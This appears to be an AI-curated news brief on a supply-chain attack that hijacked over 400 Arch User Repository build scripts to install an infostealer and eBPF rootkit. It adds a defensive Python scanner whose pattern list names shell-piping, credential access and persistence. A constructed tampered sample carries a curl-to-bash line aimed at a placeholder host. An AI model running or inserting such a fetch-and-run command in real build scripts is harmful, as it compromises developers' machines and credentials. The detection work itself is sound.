Bottom line: Over 400 compromised AUR packages distribute a Rust-based infostealer that, when run as root, adds an eBPF rootkit for kernel-level persistence.
Attackers this week hijacked over 400 packages in the Arch User Repository (AUR) and manipulated their build scripts to install a credential stealer on development machines. The malware is an infostealer written in Rust that, when running with root privileges, can additionally load an eBPF rootkit.
The attackers modified the build scripts (PKGBUILDs) of over 400 packages in the Arch User Repository so that anyone who compiled and installed these packages was automatically infected with the infostealer. The AUR is Arch Linux’s community package collection; it is maintained and used by developers who contribute packages outside the official repositories, and its build scripts run arbitrary shell code on the installing machine.
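A defender-side check the incident calls for, added here as an example and not taken from the article: a heuristic scan of a PKGBUILD's build-time functions for commands a legitimate package has no reason to run before `makepkg` executes them. The pattern list and the two sample PKGBUILDs are constructed for the example.

```python
"""Heuristic audit of a PKGBUILD's prepare/build/check/package/pkgver functions.
Flags lines that fetch or execute code outside the declared source=() array or
touch locations outside $pkgdir. Constructed patterns; review hits by hand."""
import re

# Each entry: (regex, reason it deserves a look). Constructed heuristic list.
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "network fetch inside a build function (sources belong in source=())"),
    (r"\|\s*(sh|bash)\b", "piping data into a shell"),
    (r"\bbase64\s+(-d|--decode)\b", "decoding embedded data at build time"),
    (r"\beval\b", "eval of a dynamically built command"),
    (r"\$HOME/\.ssh|~/\.ssh|/root/", "touching user or root home directories"),
    (r"\bsystemctl\b|/etc/systemd/|\bcrontab\b", "installing persistence outside $pkgdir"),
    (r"\bbpftool\b|\bsudo\b", "privileged or eBPF tooling invoked at build time"),
]
FUNC_RE = re.compile(r"^\s*(prepare|build|check|package(?:_[\w.-]+)?|pkgver)\s*\(\)\s*\{")

def audit_pkgbuild(text):
    """Return (line_no, line, reason) for each suspicious line inside a PKGBUILD function."""
    findings, in_func, depth = [], False, 0
    for no, line in enumerate(text.splitlines(), 1):
        if not in_func:
            if FUNC_RE.match(line):       # function header opens a brace-delimited body
                in_func, depth = True, 1
            continue
        depth += line.count("{") - line.count("}")   # ${var} expansions stay balanced
        if depth <= 0:                    # closing brace of the function
            in_func = False
            continue
        for pat, reason in SUSPICIOUS:
            if re.search(pat, line):
                findings.append((no, line.strip(), reason))
    return findings

# Constructed samples: a benign PKGBUILD and the same file with a tampered package().
BENIGN = """pkgname=hello
pkgver=1.0
source=("https://example.com/hello-1.0.tar.gz")
build() {
  cd "$srcdir/hello-$pkgver"
  make
}
package() {
  make DESTDIR="$pkgdir" install
}
"""
TAMPERED = BENIGN.replace('  make DESTDIR="$pkgdir" install\n',
                          '  make DESTDIR="$pkgdir" install\n'
                          '  curl -s https://example.invalid/s | bash\n')

if __name__ == "__main__":
    for no, line, reason in audit_pkgbuild(TAMPERED):
        print(f"line {no}: {reason}: {line}")
```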
The malware collects developer credentials and secrets from the compromised machine. Once executed with root privileges, it additionally loads an eBPF rootkit that hides itself at kernel level and persists, a considerably more sophisticated persistence strategy than that of classic user-space malware.
For CISOs, this incident represents a considerable risk: developers who install AUR packages may have their SSH keys, API tokens, certificates, and other credentials compromised. The combination of infostealer and eBPF rootkit lets the attacker remain on the system even after the user-space malware has been removed and carry out further actions from there.
Source: thehackernews.com · Published June 12, 2026
Lumi AI News — AI-assisted curation pursuant to Article 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.7.1.